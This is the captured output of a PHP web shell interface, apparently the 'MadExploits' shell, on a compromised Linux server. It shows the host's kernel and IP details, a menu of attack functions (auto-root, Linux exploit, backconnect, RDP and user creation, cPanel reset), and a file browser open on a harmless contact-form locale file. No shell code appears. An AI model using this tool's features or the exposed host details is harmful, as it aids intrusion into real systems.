Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els11.x86_64 #1 SMP Sun Nov 3 09:06:59 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.145.91.152
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
installatron /
installers /
contactform /
[ HOME SHELL ]
Name
Size
Permission
Action
1.0
[ DIR ]
drwxr-xr-x
1.1
[ DIR ]
drwxr-xr-x
1.2
[ DIR ]
drwxr-xr-x
1.3mod
[ DIR ]
drwxr-xr-x
button.gif
2.27
KB
-rw-r--r--
icon.gif
18.06
KB
-rw-r--r--
icon64.gif
2.98
KB
-rw-r--r--
init.xml
952
B
-rw-r--r--
init.xml.cache
1.06
KB
-rw-r--r--
locale_ar.ini
2.78
KB
-rw-r--r--
locale_bn.ini
2.56
KB
-rw-r--r--
locale_bs.ini
2.56
KB
-rw-r--r--
locale_cr.ini
2.56
KB
-rw-r--r--
locale_cs.ini
2.56
KB
-rw-r--r--
locale_da.ini
2.62
KB
-rw-r--r--
locale_de.ini
2.58
KB
-rw-r--r--
locale_el.ini
3
KB
-rw-r--r--
locale_en.ini
2.56
KB
-rw-r--r--
locale_en.php
2.81
KB
-rw-r--r--
locale_es.ini
2.69
KB
-rw-r--r--
locale_et.ini
2.56
KB
-rw-r--r--
locale_fa.ini
2.56
KB
-rw-r--r--
locale_fi.ini
2.58
KB
-rw-r--r--
locale_fr.ini
2.62
KB
-rw-r--r--
locale_gsw.ini
2.56
KB
-rw-r--r--
locale_hi.ini
2.56
KB
-rw-r--r--
locale_hu.ini
2.56
KB
-rw-r--r--
locale_in.ini
2.61
KB
-rw-r--r--
locale_is.ini
2.56
KB
-rw-r--r--
locale_it.ini
2.65
KB
-rw-r--r--
locale_iw.ini
2.56
KB
-rw-r--r--
locale_ja.ini
2.81
KB
-rw-r--r--
locale_ko.ini
2.67
KB
-rw-r--r--
locale_lt.ini
2.56
KB
-rw-r--r--
locale_mk.ini
2.56
KB
-rw-r--r--
locale_ms.ini
2.58
KB
-rw-r--r--
locale_nl.ini
2.61
KB
-rw-r--r--
locale_no.ini
2.6
KB
-rw-r--r--
locale_pa.ini
2.56
KB
-rw-r--r--
locale_pl.ini
2.65
KB
-rw-r--r--
locale_pt.ini
2.64
KB
-rw-r--r--
locale_pt_br.ini
2.64
KB
-rw-r--r--
locale_ro.ini
2.64
KB
-rw-r--r--
locale_ru.ini
2.89
KB
-rw-r--r--
locale_sk.ini
2.56
KB
-rw-r--r--
locale_sl.ini
2.56
KB
-rw-r--r--
locale_sr.ini
2.56
KB
-rw-r--r--
locale_sv.ini
2.6
KB
-rw-r--r--
locale_th.ini
3.08
KB
-rw-r--r--
locale_tl.ini
2.67
KB
-rw-r--r--
locale_tr.ini
2.56
KB
-rw-r--r--
locale_uk.ini
2.9
KB
-rw-r--r--
locale_vi.ini
2.7
KB
-rw-r--r--
locale_zh.ini
2.58
KB
-rw-r--r--
locale_zh_tw.ini
2.56
KB
-rw-r--r--
logo.gif
13.5
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : locale_en.php
<?php itron::$locale = array_merge(itron::$locale,array( "_installer_contactform_title" => "Contact Form", "_installer_contactform_type" => "_types_email", "_installer_contactform_category" => "_categories_miscellaneous", "_installer_contactform_input_email_label" => "_info_adminemail", "_installer_contactform_input_email_text" => "_settings_adminemail", "_installer_contactform_input_subject_label" => "Subject", "_installer_contactform_input_subject_text" => "The subject of the emails", "_installer_contactform_input_thankyou_label" => "Message-Sent URL", "_installer_contactform_input_thankyou_text" => "What page to load after the email is sent (can be your index page)", "_installer_contactform_description" => "Contact Form is a simple open source website contact form.", "_installer_contactform_authordescription" => "Contact Form provides a simple way for visitors to contact you through your website. In addition to being a quick and easy way for visitors to contact you, this also helps eliminate spam by hiding your email address from spambots.", "_installer_contactform_usagenotes" => "Now cut and paste this form code into your webpage (you can also edit the HTML formatting to taste):<br><br><textarea rows=32 cols=77 wrap=OFF><form name=\"form\" method=\"post\" action=\"{dir}/contactscript.php\">{nl}<table width=\"400\" border=\"0\" cellspacing=\"2\" cellpadding=\"2\">{nl} <tr>{nl} <td width=\"200\" valign=\"top\" align=\"right\">Your Name: </td>{nl} <td width=\"200\" valign=\"top\" align=\"left\">{nl} <input type=\"text\" name=\"name\" size=\"25\" maxlength=\"200\" />{nl} </td>{nl} </tr><tr>{nl} <td width=\"200\" valign=\"top\" align=\"right\">Your Email: </td>{nl} <td width=\"200\" valign=\"top\" align=\"left\">{nl} <input type=\"text\" name=\"email\" size=\"25\" maxlength=\"100\" />{nl} </td>{nl} </tr><tr>{nl} <td width=\"200\" valign=\"top\" align=\"right\">Your Comments: </td>{nl} <td width=\"200\" valign=\"top\" align=\"left\">{nl} <textarea name=\"msg\" cols=\"25\" rows=\"4\"></textarea>{nl} </td>{nl} </tr><tr>{nl} <td width=\"200\" valign=\"top\"> </td>{nl} <td width=\"200\" valign=\"top\" align=\"left\">{nl} <input type=\"reset\" name=\"Reset\" value=\"Reset\" />{nl} <input type=\"submit\" name=\"Submit\" value=\"Submit\" />{nl} </td>{nl} </tr>{nl}</table>{nl}</form></textarea><br><br>Once the code is added to your webpage, the contact form will work.<br><br>You can change your email address, email subject, and submission-sent URL by manually editing the <b>contactscript.php</b> script in the installation directory.", )); ?>
Close